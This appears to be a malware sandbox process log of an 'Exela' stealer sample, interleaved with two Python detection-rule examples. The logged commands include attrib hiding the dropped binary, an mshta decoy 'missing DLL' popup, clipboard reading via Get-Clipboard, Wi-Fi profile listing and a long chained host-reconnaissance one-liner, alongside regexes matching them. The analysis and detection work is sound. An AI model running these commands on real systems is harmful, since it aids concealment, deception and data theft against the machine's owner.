                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                          Imagebase:0x7ff786440000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:10
Start time:20:53:01
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
Imagebase:0x7ff6bee00000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:20:53:01
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:20:53:01
Start date:31/12/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Imagebase:0x7ff693090000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:20:53:02
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
Imagebase:0x7ff6bee00000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:20:53:02
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:20:53:02
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:0x7ff6bee00000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:20:53:02
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:20:53:02
Start date:31/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Imagebase:0x7ff7efb30000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:20:53:02
Start date:31/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist
Imagebase:0x7ff7699e0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
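
The process records above show three behaviours worth turning into detections: attrib.exe hiding the dropped binary under the user's AppData with +h +s, mshta.exe running an inline javascript: payload whose only job is to pop a decoy "missing DLL" error so the victim believes the program simply crashed, and tasklist for process discovery. The following is an added example, not Joe Sandbox output and not code from the sample; it parses records in the report's own Key:Value layout and applies one rule per behaviour. The records embedded in it are a constructed, field-trimmed copy of the command lines shown above plus one benign attrib invocation as a negative case; the rule names and severity labels are this example's own.

```python
"""Detection pass over Joe Sandbox-style process records (added example)."""
import re

# Constructed sample: records 12, 17 and 18 from the process list above,
# trimmed to the fields the rules need, plus a benign attrib call (99).
SAMPLE_RECORDS = """\
Target ID:12
Path:C:\\Windows\\System32\\attrib.exe
Commandline:attrib +h +s "C:\\Users\\user\\AppData\\Local\\ExelaUpdateService\\Exela.exe"
Has administrator privileges:true

Target ID:17
Path:C:\\Windows\\System32\\mshta.exe
Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Has administrator privileges:true

Target ID:18
Path:C:\\Windows\\System32\\tasklist.exe
Commandline:tasklist
Has administrator privileges:true

Target ID:99
Path:C:\\Windows\\System32\\attrib.exe
Commandline:attrib -r "C:\\Program Files\\Vendor\\readme.txt"
Has administrator privileges:false
"""

# A user can write here without elevation; hiding a freshly dropped binary
# there with +h +s is the "drop, then conceal" step of persistence.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)


def parse_records(text):
    """Split blank-line-separated 'Key:Value' blocks into dicts.

    Only the first ':' separates key from value, so drive letters in Path
    and the 'javascript:' scheme inside Commandline survive intact."""
    records, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def image_name(rec):
    return rec.get("Path", "").rsplit("\\", 1)[-1].lower()


def rule_attrib_hide(rec):
    if image_name(rec) != "attrib.exe":
        return None
    cmd = rec.get("Commandline", "")
    flags = {tok.lower() for tok in cmd.split() if tok.lower() in ("+h", "+s")}
    if flags == {"+h", "+s"} and USER_WRITABLE.search(cmd):
        return ("attrib hides a binary under a user-writable path", "high")
    return None


def rule_mshta_inline_js(rec):
    if image_name(rec) != "mshta.exe":
        return None
    cmd = rec.get("Commandline", "")
    if not re.search(r"\bjavascript:", cmd, re.IGNORECASE):
        return None
    # WScript.Shell.Popup from mshta is how the sample shows a fake
    # "missing DLL" dialog instead of doing anything visible.
    decoy = "WScript.Shell" in cmd and ".Popup(" in cmd
    detail = "mshta executes inline javascript:"
    if decoy:
        detail += " (decoy error dialog)"
    return (detail, "high")


def rule_process_discovery(rec):
    # Benign on its own; kept as low-severity context for correlation.
    if image_name(rec) == "tasklist.exe":
        return ("process enumeration via tasklist (context only)", "low")
    return None


RULES = (rule_attrib_hide, rule_mshta_inline_js, rule_process_discovery)


def scan(text):
    """Return one finding dict per (record, rule) match."""
    findings = []
    for rec in parse_records(text):
        for rule in RULES:
            hit = rule(rec)
            if hit:
                detail, severity = hit
                findings.append({
                    "target": rec.get("Target ID"),
                    "rule": rule.__name__,
                    "severity": severity,
                    "detail": detail,
                    "admin": rec.get("Has administrator privileges") == "true",
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f['severity']:<4}] target {f['target']}: {f['detail']} (admin={f['admin']})")
```

Two caveats a practitioner would add: the popup text imitates the real Universal CRT error message, but the DLL name in the command line is mangled (`api-ms-win-crt-runtime-|l1-1-.dll`), so that literal string is a cheap indicator in its own right; and every process in these records ran with administrator privileges, which is why the attrib and firewall changes elsewhere in the report succeeded without a prompt. The tasklist rule fires on ordinary admin activity too and is only useful when scored together with the other two.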

Target ID:19
Start time:20:53:03
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Imagebase:0x7ff6bee00000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

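The process records above are the raw material for a hunting rule: the sample runs as administrator and, through cmd.exe, enumerates processes with `tasklist /FO LIST` and reads the clipboard with `powershell.exe Get-Clipboard`, while the conhost.exe and chcp.com children are console plumbing. The following Python is an added example, not part of the Joe Sandbox report and not the stealer's own code. It parses records in the same `Key:value` layout used on this page, applies a few command-line rules, and returns the matches. The sample text is constructed from the Target ID 19, 22, 24, 25, 27 and 28 entries (trimmed to the fields the rules use); the rule names, patterns and the `hunt` function are this example's own choices, not Joe Sandbox signature names.

```python
import re

# Constructed sample: a trimmed copy of the Target ID 19/22/24/25/27/28 records
# from this report, in the report's own "Key:value" layout. Not a live capture.
SAMPLE_RECORDS = r"""
Target ID:19
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Has administrator privileges:true

Target ID:22
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Has administrator privileges:true

Target ID:24
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Has administrator privileges:true

Target ID:25
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Has administrator privileges:true

Target ID:27
Path:C:\Windows\System32\cmd.exe
Commandline:cmd.exe /c chcp
Has administrator privileges:true

Target ID:28
Path:C:\Windows\System32\chcp.com
Commandline:chcp
Has administrator privileges:true
"""

# Rule names and regexes are assumptions made for this example, not Joe Sandbox
# signature names. The first two are high-signal stealer behaviour seen above;
# the third (cmd.exe spawning another cmd.exe /c) is low-signal context that is
# typical of a Python subprocess(shell=True) wrapper and is worth correlating.
RULES = [
    ("clipboard_harvest_via_powershell",
     re.compile(r"powershell(\.exe)?\b.*\bGet-Clipboard\b", re.I)),
    ("process_enumeration_tasklist",
     re.compile(r"\btasklist(\.exe)?\b", re.I)),
    ("nested_cmd_c",
     re.compile(r'cmd(\.exe)?\s+/c\s+"?cmd(\.exe)?\s+/c\b', re.I)),
]


def parse_records(text):
    """Split report text into records (blank-line separated) of Key -> value.

    Values may themselves contain ':' (drive letters), so split on the first
    colon only.
    """
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            line = line.strip()
            if not line or ":" not in line:
                continue
            key, value = line.split(":", 1)
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def scan(records):
    """Apply every rule to every record's Commandline; one finding per match."""
    findings = []
    for rec in records:
        cmdline = rec.get("Commandline", "")
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append({
                    "target_id": rec.get("Target ID"),
                    "rule": name,
                    # Elevated stealer activity is worse: it can reach every
                    # user's profile, not just the one that ran the sample.
                    "elevated": rec.get("Has administrator privileges") == "true",
                    "commandline": cmdline,
                })
    return findings


def hunt(text=SAMPLE_RECORDS):
    """Parse and scan in one call; returns the list of findings."""
    return scan(parse_records(text))


if __name__ == "__main__":
    for f in hunt():
        print(f"[{f['rule']}] target {f['target_id']} "
              f"elevated={f['elevated']}: {f['commandline']}")
```

Run against the constructed sample, the scan flags Target 22 (tasklist), Target 24 (Get-Clipboard) and Target 19 (nested cmd.exe), and leaves the conhost.exe and chcp.com children alone. On real EDR or Sysmon process-creation data the same rules apply to the command-line field, but expect `Get-Clipboard` to appear in benign admin scripts too; the parent chain (cmd.exe spawned by a freshly dropped executable, as here) is what makes it worth an alert.
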
Target ID:28
Start time:20:53:03
Start date:31/12/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp
Imagebase:0x7ff7e5100000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                          Imagebase:0x7ff786440000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff7e5100000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:36
Start time: 20:53:04
Start date: 31/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 20:53:04
Start date: 31/12/2024
Path: C:\Windows\System32\systeminfo.exe
Wow64 process (32bit): false
Commandline: systeminfo
Imagebase: 0x7ff6d6950000
File size: 110'080 bytes
MD5 hash: EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 20:53:04
Start date: 31/12/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profiles
Imagebase: 0x7ff633c30000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 20:53:04
Start date: 31/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 20:53:05
Start date: 31/12/2024
Path: C:\Windows\System32\HOSTNAME.EXE
Wow64 process (32bit): false
Commandline: hostname
Imagebase: 0x7ff688410000
File size: 14'848 bytes
MD5 hash: 33AFAA43B84BDEAB12E02F9DBD2B2EE0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 20:53:06
Start date: 31/12/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic logicaldisk get caption,description,providername
Imagebase: 0x7ff70bb60000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 20:53:06
Start date: 31/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 43
Start time: 20:53:07
Start date: 31/12/2024
Path: C:\Windows\System32\net.exe
Wow64 process (32bit): false
Commandline: net user
Imagebase: 0x7ff6f83b0000
File size: 59'904 bytes
MD5 hash: 0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 20:53:07
Start date: 31/12/2024
